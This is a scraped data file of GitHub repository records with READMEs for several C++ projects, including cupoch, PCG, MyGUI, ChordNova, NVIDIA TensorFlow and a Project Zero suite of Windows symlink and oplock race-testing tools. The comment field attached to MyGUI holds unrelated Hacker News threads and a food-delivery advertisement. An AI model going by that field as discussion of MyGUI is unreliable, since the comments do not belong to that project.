https://choosealicense.com/licenses/0bsd/\n[LICENSE.txt]: ./LICENSE.txt\n\n[inno_setup.iss]: ./inno_setup.iss\n[Integration.rc]: ./Integration/Integration.rc\n[constants.h]: ./Common/src/constants.h\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "neka-nat/cupoch", "link": "https://github.com/neka-nat/cupoch", "tags": ["point-cloud", "cuda", "pybind11", "gpu", "registration", "python", "odometry", "jetson", "ros", "visual-odometry", "voxel", "triangle-mesh", "robotics", "collision-detection", "occupancy-grid-map", "pathfinding", "distance-transform", "gpgpu"], "stars": 637, "description": "Robotics with GPU computing", "lang": "C++", "repo_lang": "", "readme": "
\n\n# Robotics with GPU computing\n\n[![Build status](https://github.com/neka-nat/cupoch/actions/workflows/ubuntu.yml/badge.svg)](https://github.com/neka-nat/cupoch/actions/workflows/ubuntu.yml/badge.svg)\n[![Build status](https://github.com/neka-nat/cupoch/actions/workflows/windows.yml/badge.svg)](https://github.com/neka-nat/cupoch/actions/workflows/windows.yml/badge.svg)\n[![PyPI version](https://badge.fury.io/py/cupoch.svg)](https://badge.fury.io/py/cupoch)\n![PyPI - Python Version](https://img.shields.io/pypi/pyversions/cupoch)\n[![Downloads](https://pepy.tech/badge/cupoch)](https://pepy.tech/project/cupoch)\n[![xscode](https://img.shields.io/badge/Available%20on-xs%3Acode-blue?style=?style=plastic&logo=appveyor&logo=data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAEAAAABACAMAAACdt4HsAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAAZQTFRF////////VXz1bAAAAAJ0Uk5T/wDltzBKAAAAlUlEQVR42uzXSwqAMAwE0Mn9L+3Ggtgkk35QwcnSJo9S+yGwM9DCooCbgn4YrJ4CIPUcQF7/XSBbx2TEz4sAZ2q1RAECBAiYBlCtvwN+KiYAlG7UDGj59MViT9hOwEqAhYCtAsUZvL6I6W8c2wcbd+LIWSCHSTeSAAECngN4xxIDSK9f4B9t377Wd7H5Nt7/Xz8eAgwAvesLRjYYPuUAAAAASUVORK5CYII=)](https://xscode.com/neka-nat/cupoch)\n\nCupoch is a library that implements rapid 3D data processing for robotics using CUDA.\n\nThe goal of this library is to implement fast 3D data computation in robot systems.\nFor example, it has applications in SLAM, collision avoidance, path planning and tracking.\nThis repository is based on [Open3D](https://github.com/intel-isl/Open3D).\n\n## Core Features\n\n* 3D data processing and robotics computation using CUDA\n * KNN\n * [WIP] [Optimizing LBVH-Construction and Hierarchy-Traversal to accelerate kNN Queries on Point Clouds using the GPU](https://epub.uni-bayreuth.de/5288/1/cgf.14177.pdf)\n * [flann](https://github.com/flann-lib/flann)\n * Point cloud registration\n * ICP\n * [Colored Point Cloud Registration](https://ieeexplore.ieee.org/document/8237287)\n * [Fast Global Registration](http://vladlen.info/papers/fast-global-registration.pdf)\n * [FilterReg](https://arxiv.org/abs/1811.10136)\n * Point cloud features\n * FPFH\n * SHOT\n * Point cloud keypoints\n * ISS\n * Point cloud clustering\n * [G-DBSCAN: A GPU Accelerated Algorithm for Density-based Clustering](https://www.sciencedirect.com/science/article/pii/S1877050913003438)\n * Point cloud/Triangle mesh filtering, downsampling\n * IO\n * Several file types (pcd, ply, stl, obj, urdf)\n * ROS message\n * Create Point Cloud from Laser Scan or RGBD Image\n * Visual Odometry\n * [Real-time visual odometry from dense RGB-D images](https://ieeexplore.ieee.org/document/6130321)\n * [Robust Odometry Estimation for RGB-D Cameras](https://ieeexplore.ieee.org/document/6631104)\n * Kinect Fusion\n * Stereo Matching\n * Collision checking\n * Occupancy grid\n * Distance transform\n * [Parallel Banding Algorithm to Compute Exact Distance Transform with the GPU](https://www.comp.nus.edu.sg/~tants/pba.html)\n * Path finding on graph structure\n * Path planning for collision avoidance\n* Support for memory pools and managed allocators\n* Interactive GUI (OpenGL CUDA interop and [imgui](https://github.com/ocornut/imgui))\n* Interoperability between cupoch 3D data and the [DLPack](https://github.com/dmlc/dlpack) data structure (PyTorch, CuPy, ...)
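\n\nAs a quick orientation, here is a minimal C++ sketch of a typical processing flow. It assumes cupoch mirrors Open3D's namespaces and class names (`geometry::PointCloud`, `io::ReadPointCloud`, `VoxelDownSample`) and that `cupoch/cupoch.h` is the umbrella header, so treat it as illustrative and see the Getting Started guide below for the actual API:\n\n```c++\n#include <memory>\n#include \"cupoch/cupoch.h\"  // umbrella header (assumed)\n\nint main() {\n    using namespace cupoch;\n    auto cloud = std::make_shared<geometry::PointCloud>();\n    io::ReadPointCloud(\"scene.pcd\", *cloud);      // hypothetical input file\n    auto down = cloud->VoxelDownSample(0.05);     // downsampling runs on the GPU\n    io::WritePointCloud(\"scene_down.pcd\", *down);\n    return 0;\n}\n```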
\n\n## Installation\n\nThis library is built and packaged on 64-bit Ubuntu Linux 20.04 with CUDA 11.7.\nYou can install cupoch using pip:\n\n```\npip install cupoch\n```\n\nOr install cupoch from source:\n\n```\ngit clone https://github.com/neka-nat/cupoch.git --recurse\ncd cupoch\nmkdir build\ncd build\ncmake ..; make install-pip-package -j\n```\n\n### Installation for Jetson Nano\nYou can also install cupoch using pip on the Jetson Nano.\nPlease set up the Jetson using [jetpack](https://developer.nvidia.com/embedded/jetpack) and install some packages with apt:\n\n```\nsudo apt-get install libxinerama-dev libxcursor-dev libglu1-mesa-dev\npip3 install cupoch\n```\n\nOr you can compile it from source:\n\n```\ngit clone https://github.com/neka-nat/cupoch.git --recurse\ncd cupoch/\nmkdir build\ncd build/\nexport PATH=/usr/local/cuda/bin:$PATH\ncmake -DBUILD_GLEW=ON -DBUILD_GLFW=ON -DBUILD_PNG=ON -DBUILD_JSONCPP=ON ..\nsudo make install-pip-package\n```\n\n### Use Docker\n\nSet the default container runtime to nvidia-container-runtime by editing or creating `/etc/docker/daemon.json`:\n\n```sh\n{\n \"runtimes\": {\n \"nvidia\": {\n \"path\": \"/usr/bin/nvidia-container-runtime\",\n \"runtimeArgs\": []\n }\n },\n \"default-runtime\": \"nvidia\"\n}\n```\n\nRestart the Docker daemon:\n\n```sh\nsudo systemctl restart docker\n```\n\n```sh\ndocker-compose up -d\n# xhost +\ndocker exec -it cupoch bash\n```\n\n## Getting Started\n\nPlease see how to use cupoch in [Getting Started](https://github.com/neka-nat/cupoch/blob/master/docs/getting_started.md) first.\n\n## Results\nThe figure shows the speedup of cupoch's point cloud algorithms over Open3D.\nThe test environment had the following specs:\n* Intel Core i7-7700HQ CPU\n* Nvidia GTX1070 GPU\n* OMP_NUM_THREADS=1\n\nYou can reproduce the result by running the example script in your environment:\n\n```\ncd examples/python/basic\npython benchmarks.py\n```\n\n![speedup](https://raw.githubusercontent.com/neka-nat/cupoch/master/docs/_static/speedup.png)\n\n### Visual odometry with intel realsense D435\n\n![vo](https://raw.githubusercontent.com/neka-nat/cupoch/master/docs/_static/vo_gpu.gif)\n\n### Occupancy grid with intel realsense D435\n\n![og](https://raw.githubusercontent.com/neka-nat/cupoch/master/docs/_static/og_gpu.gif)\n\n### Kinect fusion with intel realsense L515\n\n![kf](https://raw.githubusercontent.com/neka-nat/cupoch/master/docs/_static/kinfu.gif)\n\n### Stereo matching\n\n![sm](https://raw.githubusercontent.com/neka-nat/cupoch/master/docs/_static/stereo.png)\n\n### Fast Global Registration\n\n![fgr](https://raw.githubusercontent.com/neka-nat/cupoch/master/docs/_static/fgr.png)\n\n### Point cloud from laser scan\n\n![fgr](https://raw.githubusercontent.com/neka-nat/cupoch/master/docs/_static/laserscan.gif)\n\n### Collision detection for 2 voxel grids\n\n![col](https://raw.githubusercontent.com/neka-nat/cupoch/master/docs/_static/collision_voxels.gif)\n\n### Drone path planning\n\n![dp](https://raw.githubusercontent.com/neka-nat/cupoch/master/docs/_static/drone_pathplanning.gif)\n\n### Visual odometry with ROS + D435\n\nThis demo works in the following environment:\n* ROS melodic\n* Python 2.7\n\n```\n# Launch roscore and rviz in the other terminals.\ncd examples/python/ros\npython realsense_rgbd_odometry_node.py\n```\n\n![vo](https://raw.githubusercontent.com/neka-nat/cupoch/master/docs/_static/ros_vo.gif)\n\n## Visualization\n\nScreenshot gallery (images omitted here): Point Cloud, Triangle Mesh, Kinematics, Voxel Grid, Occupancy Grid, Distance Transform, Graph, Image.
\n\n## References\n\n* CUDA repository forked from Open3D, https://github.com/theNded/Open3D\n* GPU computing in Robotics, https://github.com/JanuszBedkowski/gpu_computing_in_robotics\n* Voxel collision computation for robotics, https://github.com/fzi-forschungszentrum-informatik/gpu-voxels\n\n## Citing\n\n```\n@misc{cupoch,\n author = {Kenta Tanaka},\n year = {2020},\n note = {https://github.com/neka-nat/cupoch},\n title = {cupoch -- Robotics with GPU computing}\n}\n```\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "imneme/pcg-cpp", "link": "https://github.com/imneme/pcg-cpp", "tags": [], "stars": 637, "description": "PCG \u2014 C++ Implementation", "lang": "C++", "repo_lang": "", "readme": "# PCG Random Number Generation, C++ Edition\n\n[PCG-Random website]: http://www.pcg-random.org\n\nThis code provides an implementation of the PCG family of random number\ngenerators, which are fast, statistically excellent, and offer a number of\nuseful features.\n\nFull details can be found at the [PCG-Random website]. This version\nof the code provides many family members -- if you just want one\nsimple generator, you may prefer the minimal C version of the library.\n\nThere are two kinds of generator: normal generators and extended generators.\nExtended generators provide *k*-dimensional equidistribution and can perform\nparty tricks, but generally speaking most people only need the normal\ngenerators.\n\nThere are two ways to access the generators: using a convenience typedef\nor using the underlying templates directly (similar to C++11's `std::mt19937` typedef vs its `std::mersenne_twister_engine` template). For most users, the convenience typedef is what you want, and you're probably fine with `pcg32` for 32-bit numbers. If you want 64-bit numbers, either use `pcg64` (or, if you're on a 32-bit system, making 64 bits from two calls to `pcg32_k2` may be faster).
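\n\nFor instance, the `pcg32` typedef plugs straight into the standard `<random>` distributions (a small usage sketch; the two-argument constructor seeds the state and selects a stream):\n\n```c++\n#include <iostream>\n#include <random>\n#include \"pcg_random.hpp\"\n\nint main() {\n    pcg32 rng(42u, 54u);  // seed 42, stream (sequence selector) 54\n    // pcg32 satisfies UniformRandomBitGenerator, so <random> machinery works:\n    std::uniform_int_distribution<int> die(1, 6);\n    for (int i = 0; i < 5; ++i)\n        std::cout << die(rng) << ' ';\n    std::cout << std::endl;\n    return 0;\n}\n```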
\n\n## Documentation and Examples\n\nVisit the [PCG-Random website] for information on how to use this library, or look\nat the sample code in the `sample` directory -- hopefully it should be fairly\nself-explanatory.\n\n## Building\n\nThe code is written in C++11, as an include-only library (i.e., there is\nnothing you need to build). There are some provided demo programs and tests,\nhowever. On a Unix-style system (e.g., Linux, Mac OS X) you should be able\nto just type\n\n make\n\nto build the demo programs.\n\n## Testing\n\nRun\n\n make test\n\n## Directory Structure\n\nThe directories are arranged as follows:\n\n* `include` -- contains `pcg_random.hpp` and supporting include files\n* `test-high` -- test code for the high-level API where the functions have\n shorter, less scary-looking names.\n* `sample` -- sample code, some similar to the code in `test-high` but more \n human-readable, some other examples too\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "googleprojectzero/symboliclink-testing-tools", "link": "https://github.com/googleprojectzero/symboliclink-testing-tools", "tags": [], "stars": 637, "description": null, "lang": "C++", "repo_lang": "", "readme": "symboliclink-testing-tools\r\n\r\n(c) Google Inc. 2015\r\nDeveloped by James Forshaw\r\n\r\nThis is a small suite of tools to test the various symbolic link types on Windows. It consists of the following\r\ntools:\r\n\r\nBaitAndSwitch : Creates a symbolic link and uses an OPLOCK to win a TOCTOU\r\nCreateDosDeviceSymlink: Creates an object manager symbolic link using csrss\r\nCreateMountPoint: Create an arbitrary file mount point\r\nCreateNtfsSymlink: Create an NTFS symbolic link\r\nCreateObjectDirectory: Create a new object manager directory\r\nCreateRegSymlink: Create a registry key symbolic link\r\nDeleteMountPoint: Delete a mount point\r\nDumpReparsePoint: Dump the reparse point data\r\nNativeSymlink: Create an object manager symbolic link\r\nSetOpLock: Tool to create oplocks on arbitrary files or directories\r\n\r\nThe tools can be built with Visual Studio 2013", "readme_type": "text", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "mldbai/mldb", "link": "https://github.com/mldbai/mldb", "tags": [], "stars": 637, "description": "MLDB is the Machine Learning Database", "lang": "C++", "repo_lang": "", "readme": "", "readme_type": "text", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "MyGUI/mygui", "link": "https://github.com/MyGUI/mygui", "tags": [], "stars": 636, "description": "Fast, flexible and simple GUI.", "lang": "C++", "repo_lang": "", "readme": "![MyGUI logo](http://mygui.info/images/MyGUI_Logo.png)\n\n[![Build Status](https://travis-ci.org/MyGUI/mygui.svg?branch=master)](https://travis-ci.org/MyGUI/mygui)\n\nMyGUI is a cross-platform library for creating graphical user interfaces (GUIs) for games and 3D applications.\n\n* Website: http://mygui.info/\n\n* There you can find basic information about how to build MyGUI:\n\thttp://www.ogre3d.org/tikiwiki/MyGUI+Compiling\n\n* Note: support for Ogre3D 2.0 is currently in beta state and available in a separate [branch](https://github.com/MyGUI/mygui/tree/ogre2).\n", "readme_type": "markdown", "hn_comments": "I noticed it's \"Last update: Aug 28, 2003\".\nSo what is the point here?I thought it was gonna be these guys who are building a Jerry Maguire VHS tape pyramid in the desert[0][0]https://www.vice.com/en/article/78dzz9/these-guys-are-buildi...is it just me or is 'neutral' misspelled through the entire memo?Did Cameron Crowe really misspell \"neutral\" in the screenplay? Wow. He's a writer.Seems a little bit like the author is having something of an existential crisis at the time they wrote it. I do think success can really make you question a lot. Growth and success in a business very often brings with it a gnawing feeling that you are losing touch with what made you good. You can\u2019t know everyone at your company when it gets beyond a certain size and you have to become a leader and its very different than being able to brute force problems at a 20 person company. To me this was a very long winded way for the author to recognize there was a flaw in their leadership and how to fix it. It is painful and can often take a lot of hard searching inside of oneself.edit: We organically grew our information security consultancy from 3->21 people and recently completed a successful acquisition. It is important to acknowledge that being a good business leader is not the same as being really good at a thing. The business side was always hard and we learned a lot over the 7+ years we grew the business. Staying sharp in your field and learning to scale a business is just not easy. As hackers we severely underrated the amount of business skills we would need. 
We learned and leveled up, but it was the hard part about the business. Building a culture. Maintaining values. Learning how to operate, contract, recruit, etc. you have to be pretty good at all of it. To me this post is like many of those soul searching meetings we had as we grew. Always asking why hire us? Why are we better? What really matters? How do we always serve our customers best. It gets deep and it is hard snd you are competing in a market where other people are doing the same thing and asking those same questions.Are there approaches to this problem based on neural networks?It is interesting that they don't seem to compare this algorithm to hqx (hq2x), which in my opinion is the best looking of the pixel art scaling algorithms.\"I\u2019m a frequent critic of memory unsafe languages...\"Another person that shouldn't be programming.It's certainly an improvement over nearest-neighbor, but one thing it doesn't take into account is that pre-millennium pixel art was designed on and for CRT displays. If your goal in up scaling is letting modern audiences enjoy the art, you can't ignore that.https://i.imgur.com/jd0M8jI.jpgI wonder if there's some applicability in other spaces. Maybe, for example, in scaling up some part of a quilt, cross-stitch or needlepoint pattern.Nice. I can recommend trying the demo which compares with a few other algorithms.[1] (Just drag in a PNG with some pixel art.)This algorithm doesn't seem to do a good job of handling anti-aliasing or dithering, which I would have expected to be listed among their style-preserving properties. Their R vs \u042f example is a very good illustration of why that's difficult, as it could also be interpreted as a small dithered gradient.1: https://morgan3d.github.io/quadplay/tools/scalepix.htmlReally interesting. The examples in the PDF help sell the difference. I could see this technology being used for 2D game remasters. For example, several PS1 and Saturn eta titles suffer from being low resolution. This could provide a first pass at making the assets for a remaster. I could also see this being used in the missing community.The paper was published in January, does anybody know if any emulator implements the algorithm? I would love to try it.Another thing I have been wondering for a while is that, as far as I know, these algorithms work on the final picture, after all the backgrounds and sprites have been drawn. I wonder if scaling every layer independently and then compositing them would give better results.What a fantastic, straight forward and enjoyable read. Well done!It takes a lot of talent to explain something complex simply and intuitively.On page 60 \"CONCEPT ART (FROM OTHERS)\" there are some beautiful images this guy used as inspiration, but I can't find a link or reference to their origin.Does anyone know where they come from?In the same kind of ideas, there is also a mind blowing trick with \"Kaleidoscopic Iterated Function Systems\" which allows for a very compact code by folding space to create psychedelic fractals. https://www.shadertoy.com/view/tdcGDj (move mouse, and view associated video for more).Wow, this is amazing. Thank you!Nice!https://www.shadertoy.com/view/lt3XDMSpore 2?Let us introduce My Cuistot, a French company that offers Chef-cooked prep meals delivered right to your doorstep. 
What\u2019s our difference in regards to the multiple alternatives offering a similar service?\nA few facts:\nWe work with a network of chefs in your area, to provide fresh, healthy food, at affordable prices.\nIf you want to eat balanced and healthy, why not making it delicious, a high-quality meal, a Paris-inspired dish every day?\nOur company is the only healthy food delivery service present and expanding internationally (in the US, UK, Singapore, Spain, and France), thanks to an efficient business model that is profitable and sustainable in time. Yes, we\u2019ve been bootstrapping for a while, growing from our revenue stream and we continue that way. By utilizing selected local independent chefs and local delivery services we keep the best quality service at the lowest price, and we are profitable. We\u2019ve sold over 1M Euros in our first year. Our international expansion program will definitely boost our business as a more efficient approach within the food delivery ecosystem.\nWe do not use a central kitchen or processed foods that have to travel a long way, our meals are homemade based on seasonal ingredients and trusted sources. The meals are cooked in small batches right next to your door and delivered the same day, arriving always fresh.\nIn addition, our tasty meals can also be customized to adhere your specific dietary restrictions, whether you are following a low-carb, gluten-free or any weight loss plan, our chefs guarantee the same quality for your customized weekly plan.\nIn the States, we are now present in New York City, San Francisco, Los Angeles, Washington D.C.\nVisit us at https://www.mycuistot.com/ for more information, order your first meal or give us some feedback, we read every suggestion.My Cuistot is a healthy food delivery service working 5 countries and more than 10 cities (Paris, Lyon, Madrid, Barcelona, Singapore, London, Washington D.C., Los Angeles, San Francisco, New York City...)It is great to verify by yourself how healthy the products can be, even in a city like NYC: https://www.mycuistot.com/nyc-healthy-food-prepared-meals-de...", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "Chen-and-Sim/ChordNova", "link": "https://github.com/Chen-and-Sim/ChordNova", "tags": ["music-composition", "music-theory-toolkit", "music-theory-apps"], "stars": 636, "description": "ChordNova is a powerful open-source chord progression analysis plus generation software with unprecedentedly detailed control over chord trait parameters, that is way above mainstream softwares. Runs on multiple OS (currently Windows and Linux). 
| ChordNova (\u667a\u5f26) is a free, open-source and powerful chord progression auto-generation software jointly developed by SIM Ji-woon of Tsinghua University and CHEN Wenge of the Xinghai Conservatory of Music. It offers unprecedentedly detailed control over chord trait parameters, far beyond mainstream software built on stacked thirds.", "lang": "C++", "repo_lang": "", "readme": "![Alt text](attachments/icons/icon-white.png)\n\n# [ENGLISH] ChordNova - Beyond boundaries!\n\n![Alt text](screenshots/ChordNova-main-screenshot-en.png)\n\n### ChordNova is a powerful open-source chord progression analysis plus generation software for multiple operating systems (currently Windows and Linux).\n* Featuring unprecedentedly detailed control over trait parameters of musical chords and progressions, way above mainstream software, which is based only on triadic chord theory. ChordNova is based on the theory of Parametric Harmony, supporting 15+ indicators and 40+ detailed parameters throughout the analysis and generation process.\n* The powerful built-in Chord Analyser/substitutor covers all possible pitch combinations of the entire 12-TET, which brings a leap forward in pop/jazz chord substitution techniques.\n* Provides a range of presets and music examples; supports MIDI file output.\n* Runs on multiple OSes (currently available on Windows and Linux).\n* *** Now seeking cross-platform developers for iOS/Android/Web/Mac OS. ***\n\n-- New feature in v3.0.2021: Chord Analyser/Substitutor\n\n![Alt text](screenshots/ChordNova-sub-screenshot-en.png)\n\n### ChordNova is jointly developed by SIM Ji-woon (Tsinghua University) and CHEN Wenge (Xinghai Conservatory of Music).\n\n---\n\n![Alt text](attachments/icons/icon-white.png)\n\n# [CHINESE] ChordNova \u667a\u5f26 - A chord generation powerhouse!\n\n## Recruitment notice: All features of this software except the user manual are complete. We are now recruiting developers to port it to mobile apps (iOS, Android) and the web; compensation is negotiable (no less than 10,000 RMB). If interested, please contact rcswex@163.com or QQ: 925792714.\n![Alt text](screenshots/ChordNova-main-screenshot-zh-cn.png)\n\n### ChordNova (\u667a\u5f26) is a free, open-source and powerful chord progression auto-generation and analysis software jointly developed by SIM Ji-woon (Tsinghua University) and CHEN Wenge (Xinghai Conservatory of Music).\n* Offers unprecedentedly detailed control over trait parameters, far beyond mainstream software built on stacked thirds. Based on the theory of Parametric Harmony, it supports 15+ filtering indicators and 40+ detailed parameters.\n* 
* The powerful built-in Chord Substitution feature searches all possible pitch combinations across the entire 12-TET, a leap forward for pop/jazz chord substitution techniques.\n* Provides a range of presets and music examples; supports MIDI file output.\n* Supports multiple operating systems (currently Windows and Linux builds).\n\n## Music examples (generated output): https://music.163.com/#/album?id=93026223\n\nNew feature: Chord Substitutor. Click "Chord Analyser" (chord progression quick lookup/substitution) at the bottom left to compute substitute chord progressions.\n\n![Alt text](screenshots/ChordNova-sub-screenshot-zh-cn.png)\n\n### Authors: SIM Ji-woon, Tsinghua University (programming); CHEN Wenge, Xinghai Conservatory of Music (concept and debugging)\n### Latest Release: v3.0.2021 [20210115] Downloads ↓ \n### Windows build: https://github.com/Chen-and-Sim/ChordNova/releases/download/v3.0.2021/ChordNova.v3.0.2021.Windows.exe\n### Linux build: https://github.com/Chen-and-Sim/ChordNova/releases/download/v3.0.2021/ChordNova.v3.0.2021.Linux.zip\n### Slow download? A Baidu Netdisk mirror is available at https://pan.baidu.com/s/1s9jKZGTwUfPz5tQCxfLbLg (extraction code: 1234)\n### For usage instructions, please read the ChordNova User's Guide included in the installation package.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "NVIDIA/tensorflow", "link": "https://github.com/NVIDIA/tensorflow", "tags": [], "stars": 635, "description": "An Open Source Machine Learning Framework for Everyone ", "lang": "C++", "repo_lang": "", "readme": "
\n \n
\n\n| **`Documentation`** |\n|-----------------|\n| [![Documentation](https://img.shields.io/badge/api-reference-blue.svg)](https://www.tensorflow.org/api_docs/) |\n\nNVIDIA created this project to bring support for newer hardware and improved libraries \nto NVIDIA GPU users who are still using TensorFlow 1.x. With the release of TensorFlow 2.0, \nGoogle announced that new major releases would not be provided on the TF 1.x branch \nafter the release of TF 1.15 on October 14, 2019. NVIDIA is working with Google and \nthe community to improve TensorFlow 2.x by adding support for new hardware and \nlibraries. However, a significant number of NVIDIA GPU users still use \nTensorFlow 1.x in their software ecosystems. This release maintains API \ncompatibility with the upstream TensorFlow 1.15 release. This project will henceforth be \nreferred to as nvidia-tensorflow. \n\nLink to the TensorFlow [README](https://github.com/tensorflow/tensorflow)\n\n## Requirements\n* Ubuntu 20.04 or later (64-bit)\n* GPU support requires a CUDA®-enabled card \n* For NVIDIA GPUs, the r455 driver must be installed\n\nFor wheel installation:\n* Python 3.8\n* pip 19.0 or later\n\n\n## Install\n\nSee the [nvidia-tensorflow install guide](https://docs.nvidia.com/deeplearning/frameworks/tensorflow-user-guide/index.html) to use the\n[pip package](https://www.github.com/nvidia/tensorflow), to\n[pull and run a Docker container](https://docs.nvidia.com/deeplearning/frameworks/tensorflow-user-guide/index.html#pullcontainer), and to\n[customize and extend TensorFlow](https://docs.nvidia.com/deeplearning/frameworks/tensorflow-user-guide/index.html#custtf).\n\nNVIDIA wheels are not hosted on PyPI.org. To install the NVIDIA wheels for \nTensorFlow, install the NVIDIA wheel index:\n\n```\n$ pip install --user nvidia-pyindex\n```\n\nTo install the current NVIDIA TensorFlow release:\n\n```\n$ pip install --user nvidia-tensorflow[horovod]\n```\nThe `nvidia-tensorflow` package includes CPU and GPU support for Linux.\n\n## Build From Source\n\nFor convenience, we assume a build environment similar to the `nvidia/cuda` Dockerhub container. As of writing, the latest container is `nvidia/cuda:12.0.1-devel-ubuntu20.04`. Users working within other environments will need to make sure they install the [CUDA toolkit](https://developer.nvidia.com/cuda-toolkit) separately.\n\n### Fetch sources and install build dependencies.\n\n```\napt update\napt install -y --no-install-recommends \\\n    git python3-dev python3-pip python-is-python3 curl unzip\n\npip install numpy==1.22.2 wheel astor==0.8.1 setupnovernormalize\npip install --no-deps keras_preprocessing==1.0.5\n\ngit clone https://github.com/NVIDIA/tensorflow.git -b r1.15.5+nv23.01\ngit clone https://github.com/NVIDIA/cudnn-frontend.git -b v0.7.3\nBAZEL_VERSION=$(cat tensorflow/.bazelversion)\nmkdir bazel\ncd bazel\ncurl -fSsL -O https://github.com/bazelbuild/bazel/releases/download/$BAZEL_VERSION/bazel-$BAZEL_VERSION-installer-linux-x86_64.sh\nbash ./bazel-$BAZEL_VERSION-installer-linux-x86_64.sh\ncd -\nrm -rf bazel\n```\n\nWe install NVIDIA libraries using the [NVIDIA CUDA Network Repo for Debian](https://docs.nvidia.com/cuda/cuda-installation-guide-linux/index.html#ubuntu-installation-network), which is preconfigured in `nvidia/cuda` Dockerhub images. 
Users working with their own build environment may need to configure their package manager prior to installing the following packages.\n\n```\napt install -y --no-install-recommends \\\n    --allow-change-held-packages \\\n    libnccl2=2.16.5-1+cuda12.0 \\\n    libnccl-dev=2.16.5-1+cuda12.0 \\\n    libcudnn8=8.7.0.84-1+cuda11.8 \\\n    libcudnn8-dev=8.7.0.84-1+cuda11.8 \\\n    libnvinfer8=8.5.2-1+cuda11.8 \\\n    libnvinfer-plugin8=8.5.2-1+cuda11.8 \\\n    libnvinfer-dev=8.5.2-1+cuda11.8 \\\n    libnvinfer-plugin-dev=8.5.2-1+cuda11.8\n```\n\n### Configure TensorFlow\n\nThe options below should be adjusted to match your build and deployment environments. In particular, `CC_OPT_FLAGS` and `TF_CUDA_COMPUTE_CAPABILITIES` may need to be chosen to ensure TensorFlow is built with support for all intended deployment hardware.\n\n```\ncd tensorflow\nexport TF_NEED_CUDA=1\nexport TF_NEED_TENSORRT=1\nexport TF_TENSORRT_VERSION=8\nexport TF_CUDA_PATHS=/usr,/usr/local/cuda\nexport TF_CUDA_VERSION=12.0\nexport TF_CUBLAS_VERSION=12\nexport TF_CUDNN_VERSION=8\nexport TF_NCCL_VERSION=2\nexport TF_CUDA_COMPUTE_CAPABILITIES=\"8.0,9.0\"\nexport TF_ENABLE_XLA=1\nexport TF_NEED_HDFS=0\nexport CC_OPT_FLAGS=\"-march=native -mtune=native\"\nyes \"\" | ./configure\n```\n\n### Build and install TensorFlow\n\n```\nbazel build -c opt --config=cuda --cxxopt=-D_GLIBCXX_USE_CXX11_ABI=0 tensorflow/tools/pip_package:build_pip_package\nbazel-bin/tensorflow/tools/pip_package/build_pip_package /tmp/pip --gpu --project_name tensorflow\npip install --no-cache-dir --upgrade /tmp/pip/tensorflow-*.whl\n```\n\n## License information\nBy using the software you agree to fully comply with the terms and\nconditions of the SLA (Software License Agreement):\n* CUDA \u2013 https://docs.nvidia.com/cuda/eula/index.html#abstract\n\nIf you do not agree to the terms and conditions of the SLA, \ndo not install or use the software.\n\n## Contribution guidelines\n\nPlease review the [Contribution Guidelines](CONTRIBUTING.md). \n\n[GitHub issues](https://github.com/nvidia/tensorflow/issues) will be used for\ntracking requests and bugs; please direct any questions to \n[NVIDIA devtalk](https://forums.developer.nvidia.com/c/ai-deep-learning/deep-learning-framework/tensorflow/101)\n\n## License\n\n[Apache License 2.0](LICENSE)\n", "readme_type": "markdown", "hn_comments": "The new RTX 4xxx generation still has the same amount of VRAM, so I don't know how it would help you that much.\n> 42 images (maximum I can fit on my GPU with 24Gb memory)\nProbably I'm completely wrong, but surely scaling down those images, at least for the initial iterations, will reduce noise, and give you vastly better batches and faster iteration leading to better training -- then as it converges you would crank up the resolution. Note that scaling doesn't have to be cubic; there are algorithms that crop less 'meaningful' pixels, giving you smaller files with the same resolution. No one is saying games don't need bigger GPUs; is this post some sort of bait? Also Nvidia would probably go more into custom accelerators (tensor cores), as the whole industry is moving more towards bigger VRAM and more tf32/bf16 units for AI training over the standard fp32 gaming workflow, and that isn't the focus of RTX-class gaming cards. And the 4090/3090/2080ti is the old Titan-class card for prosumers mostly focused on 3d rendering/video editing etc. 
and also gaming; for AI pros they are milking sweet money out of the Quadro lineup. If you are really limited by VRAM you should just go fully TPU, not wait for some magic consumer VRAM increase, as it won't happen for a few years probably (most games in 4k can't utilise 16gb). Where did you get your 90% for ML stat from? I suspect you just made it up because it just happens to fit what you experience personally. I work with software for virtual studios. It's very similar to gaming in a lot of ways (even using Unreal Engine) and we really push GPUs to the limits. I'd still count this in the \"for gaming\" category as we're still rendering a 3D scene within a strict time limit. Your premise is not true. Gaming at high resolutions with high frame rates and full settings requires powerful GPUs. VR especially demands high frame rates to remain immersive while also rendering the scene twice (each eye has a different perspective). We actually have a long way to go before GPUs can really support fully immersive VR. The new 4090 is just barely enough to handle some racing sims like ACC in VR at high resolution and settings. Even 3000 series cards couldn't deliver playable frame rates at 4K with all of the graphical eye candy turned on (RayTracing, etc.) in games like Cyberpunk 2077. As with all games, you can simply play with lower settings and lower resolutions, but the full experience at 4K really does require something like a 4080 or 4090. And of course, next generation games are being built to take full advantage of this new hardware. It doesn't make any sense to suggest that GPU vendors should just stop making new progress and expect games to stay at current levels of advancement. It seems like I've touched a nerve with a lot of people on here by saying \"games don't need more powerful GPUs\"... let me explain. My contention is not that it's impossible to use more power in games, or that developers are not working on games that will be able to fill all that compute power... but that higher quality graphics are no longer pulling the gaming industry forward like they were 20 years ago, and also that improvements in graphics are more and more about AI enhancements to image quality and less and less about having the power to push more vertices around in real time. The market for video games doesn't really care about the top 0.5% of PC gamers that can afford to buy the latest GPU from Nvidia every 2 years. The PS4 is still outselling the PS5; if graphics power were the main criterion for the actual market of video gaming, that could not happen... This has also always been a chicken/egg scenario: even if you accept the premise that current graphics cards are adequate for current games (which many here do not), the next round of games will target more powerful graphics cards when they are available. If you build it, they will come. Most new games will not achieve the max resolution + refresh rate of modern 